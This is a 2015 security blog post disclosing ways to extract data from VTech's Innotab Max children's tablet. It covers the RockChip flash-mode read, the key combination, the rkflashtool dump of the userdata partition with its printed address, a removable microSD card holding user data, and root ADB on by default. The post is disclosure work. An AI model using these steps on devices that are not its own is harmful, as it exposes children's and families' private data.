Blog: Android

VTech Innotab Max vulnerable to trivial data extraction

Ken Munro 02 Dec 2015

Just when you thought it couldn’t get much worse for VTech toys after the recent breach, we found two easy ways to pull the data from their kids Innotab tablet.

In the case of a lost, stolen or re-sold tablet, any and all data that the child or adult has put on there is exposed. Passwords, PINs, email addresses, app data, you name it.

We started by pulling the back off the tablet to see what we could find.

CPU

…and there’s our old friend the RockChip CPU. The model number printing isn’t perfectly legible but it looks to be a RK3188 unit. Just in case you missed it from our older posts then the issue is as follows:

Most devices need a mode in order to recover from a bricked state, say where an update went wrong. This is fine, one would be expected to be able to WRITE new firmware to it in this state.

However, the RockChip allows data to be READ in this mode too. That’s a huge fail.

So, plug in a USB cable, hold down cursor left, cursor up and hold down the power button for 3 secs, and you enter flash mode. You’ll need the the rkflashtool
to read memory, but here’s are the parameters you’ll retrieve:

FIRMWARE_VER:4.1.1
MACHINE_MODEL:rk30sdk
MACHINE_ID:007
MANUFACTURER:RK30SDK
MAGIC: 0x5041524B
ATAG: 0x60000800
MACHINE: 3066
CHECK_MASK: 0x80
KERNEL_IMG: 0x60408000
#RECOVER_KEY: 1,1,0,20,0
CMDLINE:board.ap_mdm=0 board.ap_has_earphone=1 board.ap_has_alsa=0 board.ap_mult
i_card=0 board.ap_data_only=2 console=ttyFIQ0 androidboot.console=ttyFIQ0 init=/
init initrd=0x62000000,0x00800000 mtdparts=rk29xxnand:0x00002000@0x00002000(misc
),0x00006000@0x00004000(kernel),0x00006000@0x0000a000(boot),0x00010000@0x0001000
0(recovery),0x00020000@0x00020000(backup),0x00040000@0x00040000(cache),0x0000200
0@0x00080000(kpanic),0x00004000@0x00082000(app),0x00300000@0x00086000(system),0x
00100000@0x00386000(data),-@0x00486000(userdata)

Lots of lovely data in there – the Android version of 4.1.1, which isn’t great. Also the address at the start of the user data partition (0x00486000).

Simply dump the data partition (will take an hour or so), mount and off you go with someone else’s data.

This bug has been known about for well over 2 years. It’s a bit lame of VTech to continue shipping vulnerable tablets, tablets that expose children’s data…

But that’s not all!

There’s a microSD card on the motherboard. It was glued on, but that took seconds to prise off.

vtech-SDcard

A quick read shows that it’s the filesystem and user data. Yes, really. On a removable SD card. Other than making for another easy route to extract sensitive data, that’s also asking for reliability trouble down the line.

There’s several GB of data on there, we haven’t had time to analyse it yet, but here’s a hexdump to prove the point.

vtech-hexdump

And to wrap up, another bug to boot

ADB enabled by default. Looks like we’re root too.

vtechadb

Verdict? VTech could do a LOT better with the security of their hardware that stores our children’s data.